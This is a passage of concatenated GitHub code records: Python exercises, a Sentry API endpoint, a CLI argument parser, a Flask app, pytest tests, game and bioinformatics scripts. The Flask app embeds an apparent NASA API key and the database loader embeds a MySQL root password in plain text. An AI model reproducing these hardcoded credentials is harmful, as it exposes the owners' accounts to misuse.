remaining lists, check the program\n#end def\n\na = None\na = put_guardian(a)\nb = None\nb = put_guardian(b)\n\nT = [1,-2,-3,4,-5,6,7,-8,9,10,11,12]\n\np = create_linked_list_with_given_elements( T )\n\n\ncnt,a,b= separation(p,a,b)\nprint_all(a.next)\nprint_all(b.next)\nprint(cnt)\n\n\n\n\n\n\n\n","repo_name":"pawlowiczf/WDI-2023","sub_path":"WDI zestaw 7/31.py","file_name":"31.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"pl","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"22518263657","text":"#!/usr/bin/env python\nfrom typing import List\n\nclass Solution1:\n def isCovered(self, ranges: List[List[int]], left: int, right: int) -> bool:\n covered = set()\n for a, b in ranges:\n for num in range(a, b+1):\n covered.add(num)\n\n for num in range(left, right+1):\n if num not in covered: return False\n return True\n\nclass Solution2:\n def isCovered(self, ranges: List[List[int]], left: int, right: int) -> bool:\n diff = [0 for _ in range(52)]\n for a, b in ranges:\n diff[a] += 1\n diff[b+1] -= 1\n\n s = 0\n for i in range(len(diff)):\n s += diff[i]\n if left <= i <= right and s <= 0: return False\n return True","repo_name":"ftakanashi/JobProjects","sub_path":"LeetCode/1893.检查区域内是否所有整数都被覆盖/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"36968480978","text":"from __future__ import absolute_import\n\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import PermissionDenied\nfrom rest_framework.response import Response\n\nfrom sentry import features\nfrom sentry.api.bases.incident import IncidentPermission\nfrom sentry.api.bases.organization import OrganizationEndpoint\nfrom sentry.api.exceptions import ResourceDoesNotExist\nfrom sentry.api.paginator import OffsetPaginator\nfrom sentry.api.serializers import serialize\nfrom sentry.api.serializers.rest_framework import ListField\nfrom sentry.incidents.logic import create_incident\nfrom sentry.incidents.models import (\n Incident,\n IncidentStatus,\n 
IncidentType,\n)\nfrom sentry.models.group import Group\nfrom sentry.models.project import Project\n\n\nclass IncidentSerializer(serializers.Serializer):\n projects = ListField(\n child=serializers.CharField(),\n required=False,\n default=[],\n )\n groups = ListField(\n child=serializers.CharField(),\n required=True,\n allow_null=False,\n )\n title = serializers.CharField(required=True)\n query = serializers.CharField(required=False, allow_blank=True, allow_null=True)\n dateStarted = serializers.DateTimeField(required=True)\n dateDetected = serializers.DateTimeField(required=False, allow_null=True)\n\n def validate_projects(self, slugs):\n projects = Project.objects.filter(\n organization=self.context['organization'],\n slug__in=slugs,\n )\n if len(projects) != len(slugs):\n raise serializers.ValidationError('Invalid project slug(s)')\n return list(projects)\n\n def validate_groups(self, group_ids):\n groups = Group.objects.filter(\n project__organization=self.context['organization'],\n id__in=group_ids,\n ).select_related('project')\n if len(groups) != len(group_ids):\n raise serializers.ValidationError('Invalid group id(s)')\n return list(groups)\n\n\nclass OrganizationIncidentIndexEndpoint(OrganizationEndpoint):\n permission_classes = (IncidentPermission, )\n\n def get(self, request, organization):\n \"\"\"\n List Incidents that a User can access within an Organization\n ````````````````````````````````````````````````````````````\n Returns a paginated list of Incidents that a user can access.\n\n :auth: required\n \"\"\"\n if not features.has('organizations:incidents', organization, actor=request.user):\n raise ResourceDoesNotExist\n\n incidents = Incident.objects.fetch_for_organization(\n organization,\n self.get_projects(request, organization),\n )\n\n query_status = request.GET.get('status')\n\n if query_status == 'open':\n incidents = incidents.filter(status=IncidentStatus.OPEN.value)\n elif query_status == 'closed':\n incidents = incidents.filter(status=IncidentStatus.CLOSED.value)\n\n return self.paginate(\n request,\n queryset=incidents,\n order_by='-date_started',\n paginator_cls=OffsetPaginator,\n on_results=lambda x: serialize(x, request.user),\n default_per_page=25,\n )\n\n def post(self, request, organization):\n if not features.has('organizations:incidents', organization, actor=request.user):\n return self.respond(status=404)\n\n serializer = IncidentSerializer(\n data=request.data,\n context={'organization': organization},\n )\n\n if serializer.is_valid():\n\n result = serializer.validated_data\n groups = result['groups']\n all_projects = set(result['projects']) | set(g.project for g in result['groups'])\n if any(p for p in all_projects if not request.access.has_project_access(p)):\n raise PermissionDenied\n\n incident = create_incident(\n organization=organization,\n type=IncidentType.CREATED,\n title=result['title'],\n query=result.get('query', ''),\n date_started=result['dateStarted'],\n date_detected=result.get('dateDetected', result['dateStarted']),\n projects=result['projects'],\n groups=groups,\n user=request.user,\n )\n return Response(serialize(incident, request.user), status=201)\n return Response(serializer.errors, status=400)\n","repo_name":"GaryChen66/sentry","sub_path":"src/sentry/api/endpoints/organization_incident_index.py","file_name":"organization_incident_index.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"2345372621","text":"import io\nimport 
sys\nimport json\n\nfrom lib.b import log\nfrom lib import entry, version\n\nVERSION_STR = 'parse_video version ' + version.parse_video_version\n\n# global data\netc = {}\netc['log_level'] = None\t# default, or 'debug', 'quiet'\n\netc['hd_min'] = None\netc['hd_max'] = None\netc['i_min'] = None\netc['i_max'] = None\n\netc['extractor'] = ''\netc['method'] = ''\n\netc['url'] = ''\netc['flag_mode'] = None\t# default mode, or 'help', 'version', 'license'\netc['output'] = '-'\t# '-' means stdout\netc['more'] = None\n\netc['flag_fix_unicode'] = False\netc['network_timeout_s'] = -1\t# -1 means no limit\netc['flag_fix_enable_more'] = False\n\n\n# print help, version and license info. (--help, --version, --license)\ndef p_help():\n print('''\\\nUsage: parsev [OPTION]... URL\nparse_video: get video info from some web sites. \n\n -i, --min HD set min hd number for video formats\n -M, --max HD set max hd\n --i-min INDEX set min index number for part video files\n --i-max INDEX set max index\n \n -e, --extractor EXTRACTOR set extractor (and extractor arguments)\n -m, --method METHOD set method (and method arguments)\n \n -o, --output FILE write result (video info) to file (default to stdout)\n --more FILE input more info from file to enable more mode\n \n --network-timeout-s set timeout (second) to network operations\n \n -d, --debug set log level to debug\n -q, --quiet set log level to quiet\n \n --help display this help and exit\n --version output version information and exit\n --license show license information and exit\n\nMore information online: \\\n''')\n\ndef p_version():\n print(VERSION_STR + '''\n\n parse_video Copyright (C) 2015-2016 sceext \n This program comes with ABSOLUTELY NO WARRANTY. This is free software, and \n you are welcome to redistribute it under certain conditions. \n\nLicense GPLv3+: GNU GPL version 3 or later . \nPlease use \"--license\" or read LICENSE for more details. \\\n''')\n\ndef p_license():\n print('''\\\n parse_video : get video info from some web sites. \n Copyright (C) 2015-2016 sceext \n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see . \\\n''')\n\n# print function\ndef p(raw):\n print(raw, file=sys.stderr, flush=True)\n\ndef p_cline_err():\n p('ERROR: bad command line format, please try \\\"--help\\\". 
')\n\ndef main(args):\n try:\n p_args(args)\n except Exception:\n p_cline_err()\n raise\n # process main start mode\n mode = etc['flag_mode']\n if mode == 'help':\n p_help()\n elif mode == 'version':\n p_version()\n elif mode == 'license':\n p_license()\n else:\t# default mode\n # check command line format Error\n if etc['url'] == '':\n p_cline_err()\n else:\n do_parse()\n # end main\n\n# NOTE more info file must be json file\ndef load_more_file(fpath):\n # NOTE support '-', read more info from stdin\n if fpath != '-':\n with open(fpath, 'rb') as f:\n blob = f.read()\n else:\t# read from stdin\n blob = sys.stdin.read()\t# NOTE just read blob\n # NOTE parse blob to json\n text = blob\n if not isinstance(text, str):\t# check to decode\n text = text.decode('utf-8')\n more_info = json.loads(text)\n return more_info\n\n\ndef do_parse():\n if etc['log_level'] != None:\n log.set_log_level(etc['log_level'])\n # set lib.var\n entry.init()\n set_list = [\n 'hd_min', \n 'hd_max', \n 'i_min', \n 'i_max', \n ]\n for key in set_list:\n entry.var._[key] = etc[key]\n # check load more file\n if etc['more'] != None:\n try:\n more_info = load_more_file(etc['more'])\n except Exception as e:\n p('ERROR: can not load more info file \\\"' + etc['more'] + '\\\" ')\n raise\n entry.var._['more'] = more_info\t# do set more\n # NOTE print parse_video version info in debug mode\n if etc['log_level'] == 'debug':\n p('DEBUG: ' + VERSION_STR)\n # NOTE set network_timeout_s\n entry.conf.network_timeout_s = etc['network_timeout_s']\n # NOTE set --fix-enable-more\n if etc['flag_fix_enable_more']:\n entry.var._['flag_fix_enable_more'] = True\n # do parse\n pvinfo = entry.parse(etc['url'], extractor=etc['extractor'], method=etc['method'])\n # print result, check --output option\n if etc['output'] == '-':\t# stdout\n # NOTE support --fix-unicode here\n p_result(pvinfo, file=sys.stdout, blob=etc['flag_fix_unicode'])\n else:\t# open output file\n try:\n with open(etc['output'], 'wb') as f:\n p_result(pvinfo, file=f, blob=True)\n except Exception as e:\n p('ERROR: can not write to output file \\\"' + etc['output'] + '\\\" ')\n raise\n # done\n\ndef p_result(pvinfo, sort_keys=False, ensure_ascii=False, file=sys.stdout, blob=False):\n text = json.dumps(pvinfo, indent=4, sort_keys=sort_keys, ensure_ascii=ensure_ascii)\n if blob:\n text += '\\n'\n blob = text.encode('utf-8')\n # NOTE fix write here\n if isinstance(file, io.TextIOWrapper):\n file = file.buffer\n file.write(blob)\n else:\n print(text, file=file, flush=True)\n\n# process command line args\ndef p_args(args):\n # TODO support --options-overwrite-once\n rest = args.copy()\n while len(rest) > 0:\n one, rest = rest[0], rest[1:]\n # --help, --version, --license\n if one == '--help':\n etc['flag_mode'] = 'help'\n elif one == '--version':\n if etc['flag_mode'] != None:\n p('ERROR: already set mode to \\\"' + etc['flag_mode'] + '\\\", can not set to --version ')\n else:\n etc['flag_mode'] = 'version'\n elif one == '--license':\n etc['flag_mode'] = 'license'\n # --debug, --quiet\n elif one in ['--debug', '-d']:\n etc['log_level'] = 'debug'\n elif one in ['--quiet', '-q']:\n if etc['log_level'] != None:\n p('ERROR: already set log_level to \\\"' + etc['log_level'] + '\\\", can not set to --quiet ')\n else:\n etc['log_level'] = 'quiet'\n # --min, --max, --min-i, --max-i\n elif one in ['--min', '-i']:\n etc['hd_min'] = float(rest[0])\n rest = rest[1:]\n elif one in ['--max', '-M']:\n etc['hd_max'] = float(rest[0])\n rest = rest[1:]\n elif one == '--i-min':\n etc['i_min'] = 
float(rest[0])\n rest = rest[1:]\n elif one == '--i-max':\n etc['i_max'] = float(rest[0])\n rest = rest[1:]\n # --extractor, --method\n elif one in ['--extractor', '-e']:\n etc['extractor'] = rest[0]\n rest = rest[1:]\n elif one in ['--method', '-m']:\n etc['method'] = rest[0]\n rest = rest[1:]\n # --output, --more\n elif one in ['--output', '-o']:\n etc['output'] = rest[0]\n rest = rest[1:]\n elif one == '--more':\n etc['more'] = rest[0]\n rest = rest[1:]\n # --fix-unicode\n elif one == '--fix-unicode':\n etc['flag_fix_unicode'] = True\n # --fix-enable-more\n elif one == '--fix-enable-more':\n etc['flag_fix_enable_more'] = True\n # TODO support --options-overwrite-once\n elif one == '--options-overwrite-once':\n pass\t# TODO\n # network_timeout_s\n elif one == '--network-timeout-s':\n etc['network_timeout_s'] = float(rest[0])\n rest = rest[1:]\n # URL\n else:\t# NOTE set URL\n if etc['url'] != '':\n p('WARNING: already set URL to \\\"' + etc['url'] + '\\\", now set to \\\"' + one + '\\\" ')\n etc['url'] = one\n # done p_args\n\n# end parse_video.py\n\n\n","repo_name":"wwqgtxx/lyp_pv","sub_path":"bin/parse_video.py","file_name":"parse_video.py","file_ext":"py","file_size_in_byte":8541,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"8527573779","text":"from flask import Flask, escape, request, render_template\nimport urllib3\nimport json\n\napp = Flask(__name__)\n@app.route('/')\ndef hello():\n print(__name__)\n\n http = urllib3.PoolManager()\n response = http.request(\n 'GET', \"https://api.nasa.gov/planetary/apod?api_key=XZwpcj1OVbMqNtKpVeQu7RDu1yrZ1gjyNxJyEe7c\")\n dat = response.data\n\n print(dat)\n\n link = json.loads(dat)[\"url\"]\n expl = json.loads(dat)[\"explanation\"]\n\n return render_template(\"img.html\", image=link, explanation=expl)\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n","repo_name":"moodyRahman/moodysoftdevgang","sub_path":"24_rest/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4235592650","text":"from .common_utils import *\r\n\r\ndef put_in_center(img_np, target_size):\r\n img_out = np.zeros([3, target_size[0], target_size[1]])\r\n \r\n bbox = [\r\n int((target_size[0] - img_np.shape[1]) / 2),\r\n int((target_size[1] - img_np.shape[2]) / 2),\r\n int((target_size[0] + img_np.shape[1]) / 2),\r\n int((target_size[1] + img_np.shape[2]) / 2),\r\n ]\r\n \r\n img_out[:, bbox[0]:bbox[2], bbox[1]:bbox[3]] = img_np\r\n \r\n return img_out\r\n\r\n\r\n\r\ndef tv_loss(x, beta = 0.5):\r\n '''Calculates TV loss for an image `x`.\r\n \r\n Args:\r\n x: image, torch.Variable of torch.Tensor\r\n beta: See https://arxiv.org/abs/1412.0035 (fig. 
2) to see effect of `beta` \r\n '''\r\n dh = torch.pow(x[:,:,:,1:] - x[:,:,:,:-1], 2)\r\n dw = torch.pow(x[:,:,1:,:] - x[:,:,:-1,:], 2)\r\n \r\n return torch.sum(torch.pow(dh[:, :, :-1] + dw[:, :, :, :-1], beta))\r\n","repo_name":"miaoyuchun/DDS2M","sub_path":"utils/sr_utils.py","file_name":"sr_utils.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"77"} +{"seq_id":"74661058488","text":"import pytest\n\n\n@pytest.mark.parametrize(\"name, country_code, token_selector_func, default_disbursement, minimum_vendor_payout_withdrawal, status_code\", [\n (\"Test Org\", 'AU', lambda t: t.id, 5, 10, 201),\n (None, None, lambda t: t.id, 5, 10, 400),\n (\"Test Org\", None, lambda t: t.id, 5, 10, 400),\n (\"Test Org 2\", 'asdf', lambda t: t.id, 5, 10, 400),\n (\"New Test Org\", 'AU', lambda t: 1932380198, 5, 10, 404),\n])\ndef test_create_organisation(test_client, complete_admin_auth_token, external_reserve_token,\n name, country_code, token_selector_func, default_disbursement, minimum_vendor_payout_withdrawal, status_code):\n\n response = test_client.post(\n '/api/v1/organisation/',\n headers=dict(\n Authorization=complete_admin_auth_token,\n Accept='application/json'\n ),\n json={\n 'organisation_name': name,\n 'timezone': 'GMT',\n 'token_id': token_selector_func(external_reserve_token),\n 'country_code': country_code,\n 'default_disbursement': default_disbursement,\n 'minimum_vendor_payout_withdrawal': minimum_vendor_payout_withdrawal,\n })\n\n assert response.status_code == status_code\n\n if status_code == 201:\n assert response.json['data']['organisation']['primary_blockchain_address']\n assert response.json['data']['organisation']['default_disbursement'] == default_disbursement\n assert response.json['data']['organisation']['minimum_vendor_payout_withdrawal'] == minimum_vendor_payout_withdrawal\n\n\n@pytest.mark.parametrize(\"org_selector_func, status_code\", [\n (lambda o: o.id, 200),\n (lambda o: 1222103, 404),\n])\ndef test_get_organisation(test_client, complete_admin_auth_token,\n create_organisation, org_selector_func, status_code):\n response = test_client.get(\n f\"/api/v1/organisation/{org_selector_func(create_organisation)}/\",\n headers=dict(\n Authorization=complete_admin_auth_token,\n Accept='application/json'\n ))\n\n assert response.status_code == status_code\n\n","repo_name":"teamsempo/SempoBlockchain","sub_path":"app/test_app/functional/api/test_organisation_api.py","file_name":"test_organisation_api.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"77"} +{"seq_id":"6897581722","text":"import re\nfrom .patterns import get_pattern\nfrom .error import GollyXMapsError, GollyXPatternsError\n\n\ndef pattern2url(pattern, xoffset=0, yoffset=0):\n rows = len(pattern)\n cols = len(pattern[0])\n listLife = []\n for i in range(rows):\n listLifeRow = {}\n for j in range(cols):\n if pattern[i][j] == \"o\":\n y = str(i + yoffset)\n x = j + xoffset\n if y in listLifeRow.keys():\n listLifeRow[y].append(x)\n else:\n listLifeRow[y] = [x]\n if len(listLifeRow.keys()) > 0:\n listLife.append(listLifeRow)\n\n s = str(listLife)\n s = s.split(\" \")\n listLife = \"\".join(s)\n listLife = re.sub(\"'\", '\"', listLife)\n return listLife\n\n\ndef print_pattern_url(\n p1=None,\n p2=None,\n xoff=[0, 0],\n yoff=[0, 0],\n hflip=[False, False],\n vflip=[False, False],\n rot=[0, 0],\n):\n url = \"\"\n for ip, pattern_name in 
enumerate([p1, p2]):\n if pattern_name is not None:\n pattern = get_pattern(pattern_name)\n\n if hflip[ip]:\n pattern = [j for j in reversed(pattern)]\n\n if vflip[ip]:\n pattern = [\"\".join(reversed(j)) for j in pattern]\n\n if rot[ip] in [90, 180, 270]:\n for i in range(rot[ip] // 90):\n pattern_tup = zip(*list(reversed(pattern)))\n pattern = [\"\".join(j) for j in pattern_tup]\n\n listLife = pattern2url(pattern)\n\n if len(url) > 0:\n url += \"&\"\n url += f\"s{ip+1}={listLife}\"\n print(url)\n\n\ndef retry_on_failure(func, *args, **kwargs):\n def wrap(*args, **kwargs):\n done = False\n maxcount = 10\n count = 0\n while not done and count < maxcount:\n try:\n return func(*args, **kwargs)\n except GollyXPatternsError:\n count += 1\n continue\n raise GollyXMapsError(f\"Error: retry failure for function {func.__name__}, tried {maxcount} times!\")\n\n return wrap\n","repo_name":"golly-splorts/gollyx-maps","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41084337113","text":"from pygame.draw import rect as drawrect\n\nfrom PPlay.sprite import Sprite\nfrom PPlay.window import Window\n\n\nclass PlayerHealthBar:\n janela = Window(1365, 768)\n # healthbar_sprite = Sprite(\"Assets/player_healthbar.png\")\n # healthbar_sprite.x = janela.width/2 - healthbar_sprite.width / 2\n # healthbar_sprite.y = janela.height - healthbar_sprite.height - 30\n healthbar_sprite = Sprite(\"Assets/hud/healthbar.png\")\n manabar_sprite = Sprite(\"Assets/hud/healthbar.png\", 5)\n healthbar_sprite.x = 158\n healthbar_sprite.y = 50\n manabar_sprite.x = healthbar_sprite.x\n manabar_sprite.y = healthbar_sprite.y + healthbar_sprite.height * 1.5\n max_mana = 100\n mana_atual = 100\n mana_ratio = mana_atual / max_mana\n old_mana_ratio = mana_ratio\n\n @classmethod\n def reset_class(cls):\n cls.janela = Window(1365, 768)\n # healthbar_sprite = Sprite(\"Assets/player_healthbar.png\")\n # healthbar_sprite.x = janela.width/2 - healthbar_sprite.width / 2\n # healthbar_sprite.y = janela.height - healthbar_sprite.height - 30\n cls.healthbar_sprite = Sprite(\"Assets/hud/healthbar.png\")\n cls.manabar_sprite = Sprite(\"Assets/hud/healthbar.png\", 5)\n cls.healthbar_sprite.x = 158\n cls.healthbar_sprite.y = 50\n cls.manabar_sprite.x = cls.healthbar_sprite.x\n cls.manabar_sprite.y = cls.healthbar_sprite.y + cls.healthbar_sprite.height * 1.5\n cls.max_mana = 100\n cls.mana_atual = 100\n cls.mana_ratio = cls.mana_atual / cls.max_mana\n cls.old_mana_ratio = cls.mana_ratio\n\n def __init__(self, max_health, starting_health, janela):\n self.max_health = max_health\n self.health_atual = starting_health\n self.old_health = self.health_atual\n self.janela = janela\n self.health_ratio = self.health_atual / self.max_health\n self.old_health_ratio = self.health_atual / self.max_health\n\n def draw(self):\n self.mostrar_dano_levado()\n self.mostrar_mana_perdida()\n drawrect(self.janela.screen, (255, 0, 0), (self.healthbar_sprite.x, self.healthbar_sprite.y,\n self.healthbar_sprite.width * self.health_ratio,\n self.healthbar_sprite.height))\n self.healthbar_sprite.draw()\n self.mana_atual += 3 * self.janela.delta_time()\n if self.mana_atual >= self.max_mana:\n self.mana_atual = self.max_mana\n self.draw_mana()\n self.manabar_sprite.draw()\n\n def levar_dano(self, qtd_dano):\n self.old_health = self.health_atual\n self.old_health_ratio = self.old_health / self.max_health\n self.health_atual -= 
qtd_dano\n if self.health_atual < 0:\n self.health_atual = 0\n self.health_ratio = self.health_atual / self.max_health\n\n def mostrar_dano_levado(self):\n drawrect(self.janela.screen, (255, 255, 255), (self.healthbar_sprite.x, self.healthbar_sprite.y,\n self.healthbar_sprite.width * self.old_health_ratio,\n self.healthbar_sprite.height))\n self.old_health -= self.max_health * 0.2 * self.janela.delta_time() / 3\n if self.old_health < 0:\n self.old_health = 0\n self.old_health_ratio = self.old_health / self.max_health\n\n def draw_mana(self):\n self.mana_ratio = self.mana_atual / self.max_mana\n # print(self.mana_ratio)\n drawrect(self.janela.screen, (15, 15, 255), (self.manabar_sprite.x, self.manabar_sprite.y,\n self.manabar_sprite.width * self.mana_ratio,\n self.manabar_sprite.height))\n\n def perder_mana(self, qtd_mana):\n self.old_mana_ratio = self.mana_ratio\n self.mana_atual -= qtd_mana\n self.mana_ratio = self.mana_atual / self.max_mana\n # print(self.mana_ratio)\n if self.mana_ratio < 0:\n self.mana_ratio = 0\n\n def mostrar_mana_perdida(self):\n drawrect(self.janela.screen, (255, 255, 255), (self.manabar_sprite.x, self.manabar_sprite.y,\n self.manabar_sprite.width * self.old_mana_ratio,\n self.manabar_sprite.height))\n self.old_mana_ratio -= self.max_mana * 1 * self.janela.delta_time() / 1.5\n","repo_name":"resendelucas/BrokenSound","sub_path":"playerhealthbar.py","file_name":"playerhealthbar.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"36340387505","text":"# Greatest common divisor and least common multiple\n\n# Complete the function solution, which takes two numbers and returns\n# their greatest common divisor and least common multiple. \n# Return an array with the GCD first, followed by the LCM. \n# For example, for the numbers 3 and 12 the GCD is 3 and the LCM is 12, so solution(3, 12) should return [3, 12].\n\ndef solution(n, m):\n a = m if n > m else n\n max_factor = max([i for i in range(1, a+1) if n % i == 0 and m % i == 0])\n \n min_mul = int(max_factor * (n/max_factor) * (m/max_factor))\n return [max_factor, min_mul]\n \nprint(solution(3, 12)) # [3, 12]\nprint(solution(2, 5)) # [1, 10]\n\n# Note: looking at other people's solutions, many used the Euclidean algorithm - try solving it that way later.","repo_name":"Kimeunseong/Programmers","sub_path":"Lv1/29_최대공약수와 최소공배수.py","file_name":"29_최대공약수와 최소공배수.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"44263849815","text":"\n\"\"\"\nProblem: Sort List\nLeetCode (CN) link: https://leetcode-cn.com/problems/sort-list/\n\nApproach:\nSolution 1:\n1. The problem requires O(n log n) time, which points to merge sort; first we need to find the middle of the list;\n2. Use fast/slow pointers: when the fast pointer reaches the end, the slow pointer is at the middle, so split there;\n3. Recursively sort the split left and right halves;\n4. Merge the two halves: create a dummy head node, walk both sides, and append whichever node is smaller to the dummy chain's next;\n5. Finally, check which side still has nodes left and append it to next;\n6. Return the merged list.\n\nComplexity analysis:\n1. Time complexity: O(nlogn)\n2. Space complexity: O(logn)\n\"\"\"\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def sortList(self, head:ListNode) -> ListNode:\n if not head or not head.next:\n return head\n \n slow, fast = head, head.next\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n mid = slow.next\n slow.next = None\n left, right = self.sortList(head), self.sortList(mid)\n\n h = res = ListNode(0)\n while left and right:\n if left.val < right.val:\n h.next = left\n left = left.next\n else:\n h.next = right\n right = right.next\n h = h.next\n h.next = left if left else right\n return res.next\n \n\n\n\n","repo_name":"anpengjin/Leetcode_hot100","sub_path":"python/链表/148.py","file_name":"148.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"34577531088","text":"from veiculos import Veiculo, Carro, Moto, Bicicleta\n\nclass Corrida:\n def __init__(self, veiculos):\n self.veiculos = veiculos\n\n def iniciar(self):\n for veiculo in self.veiculos:\n if not isinstance(veiculo, Veiculo):\n raise TypeError(f\"{veiculo} is not an instance of Veiculo\")\n veiculo.acelerar(3)\n\n\n\ncarro = Carro(\"Fusca\", 2020, \"VW\")\nmoto = Moto(\"Biz\", 2020, \"Honda\")\nbicicleta = Bicicleta()\n\ncorrida = Corrida(veiculos=[carro, moto, bicicleta])\ncorrida.iniciar()","repo_name":"codarme/curso-python","sub_path":"lives/poo_python/exemplos/corrida_check_type.py","file_name":"corrida_check_type.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"pt","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"}
+{"seq_id":"39878697829","text":"\nimport config\nimport urllib.request\nimport json\nimport sys\nimport html\nclang = \"en\" if user.name[0] in \"#!\" else config.User(user.name).lang\nurl = (\n \"https://www.googleapis.com/youtube/v3/search?q={}&part=snippet\"\n \"&maxResults=10&key=YOUTUBE_API_ID\"\n)\n\n\nif not args.strip():\n msg = config.get_lang(clang, \"missing_argument\")\n msg = msg.format(config.get_lang(clang, \"argument_query\"))\nelse:\n query = urllib.request.quote(args)\n url = url.format(query)\n res = urllib.request.urlopen(url)\n data = json.loads(res.read().decode())\n if not data[\"items\"]:\n msg = config.get_lang(clang, \"cant_found_video\")\n msg = msg.format(\"YouTube\", html.escape(args))\n else:\n item = data[\"items\"][0]\n if item[\"id\"][\"kind\"] == \"youtube#video\":\n video_id = item[\"id\"][\"videoId\"]\n video_title = item[\"snippet\"][\"title\"]\n channel_name = item[\"snippet\"][\"channelTitle\"]\n video_url = \"https://youtu.be/\" + video_id\n video_title = html.escape(video_title)\n channel_name = html.escape(channel_name)\n\n msg = config.get_lang(clang, \"found_video\")\n msg = msg.format(video_title, channel_name, video_url)\n elif item[\"id\"][\"kind\"] == \"youtube#playlist\":\n playlist_id = item[\"id\"][\"playlistId\"]\n playlist_title = item[\"snippet\"][\"title\"]\n playlist_url = (\n \"https://www.youtube.com/playlist?list=\"\n ) + playlist_id\n channel_name = item[\"snippet\"][\"channelTitle\"]\n\n playlist_title = html.escape(playlist_title)\n channel_name = html.escape(channel_name)\n\n msg = config.get_lang(clang, \"found_video\")\n msg = msg.format(playlist_title, channel_name, playlist_url)\n elif item[\"id\"][\"kind\"] == \"youtube#channel\":\n channel_id = item[\"id\"][\"channelId\"]\n channel_title = item[\"snippet\"][\"title\"]\n channel_thumb = 
item[\"snippet\"][\"thumbnails\"][\"default\"][\"url\"]\n channel_url = (\n \"https://www.youtube.com/channel/\"\n ) + channel_id\n msg = config.get_lang(clang, \"found_channel\")\n msg = msg.format(channel_title, channel_thumb, channel_url)\n else:\n msg = \"Unkown type \" + item[\"id\"][\"kind\"]\nroom.message(msg, html=True)\n","repo_name":"TheClonerx/thebotx","sub_path":"cmds/yt.py","file_name":"yt.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"10710974144","text":"#!/usr/bin/python\n\nimport sys\nfrom pathlib import Path\nfrom mu_illumina_v4 import Barcode, Cluster, GeneCoords, MaizeGene\nfrom Bio import SeqIO\nfrom progressbar import ProgressBar\nfrom BioSQL import BioSeqDatabase\n\nrun_id = sys.argv[1]\nclusters = Path(sys.argv[2])\ncounts = 0\nfor peaks in clusters.glob('**/*_nobg.peaks'):\n\twith peaks.open() as f:\n\t\twhile f.readline():\n\t\t\tcounts += 1\n\n#print(\"Indexing reference genome\")\n#maize_dict = SeqIO.index(sys.argv[3], \"fasta\")\nserver = BioSeqDatabase.open_database(driver=\"pymysql\", user=\"root\",\n passwd = \"420bigmoney\", host = \"localhost\", db=\"maizeseq\")\ndb = server[\"Zea_mays.AGPv4-GFF3\"]\n\nprint(\"Loading clusters\")\npbar = ProgressBar(max_value=counts).start()\ni = 0\nfor barcode in Barcode.select().where(Barcode.date == run_id):\n\tbc_dir = clusters / barcode.barcode\n\tfor peaks in bc_dir.glob(\"*_nobg.peaks\"):\n\t\tfor line in open(peaks):\n\t\t\tcols = line.strip().split()\n\t\t\tinsertion_start = 0\n\t\t\tinsertion_end = 0\n\t\t\tif(int(cols[6]) != 0): \n\t\t\t\tinsertion_start = int(cols[6]) - 5\n\t\t\t\tinsertion_end = int(cols[6]) + 5\n\t\t\trec = db.lookup(gi=cols[0])[int(cols[1]):int(cols[2])]\n\t\t\tgenes = set()\n\t\t\tfor gene in GeneCoords.select().where(GeneCoords.chr == cols[0]).where(GeneCoords.start < int(cols[1])).where(GeneCoords.end > int(cols[1])):\n\t\t\t\tgenes.add(gene.accession)\n\t\t\tfor gene in GeneCoords.select().where(GeneCoords.chr == cols[0]).where(GeneCoords.start < int(cols[2])).where(GeneCoords.end > int(cols[2])):\n\t\t\t\tgenes.add(gene.accession)\n\t\t\tfor gene in GeneCoords.select().where(GeneCoords.chr == cols[0]).where(GeneCoords.start > int(cols[1])).where(GeneCoords.end < int(cols[2])):\n\t\t\t\tgenes.add(gene.accession)\n\n\t\t\tcluster = Cluster.create(chr = cols[0], start = cols[1], end = cols[2], size = cols[3], insertion_start = insertion_start, insertion_end = insertion_end, barcode = barcode.id, seq = rec.seq, primer = \"\", maize = \"\", identified_gene = \"\")\n\t\t\ti += 1\n\t\t\tfor gene in genes:\n\t\t\t\tMaizeGene.create(accession = gene, cluster_id = 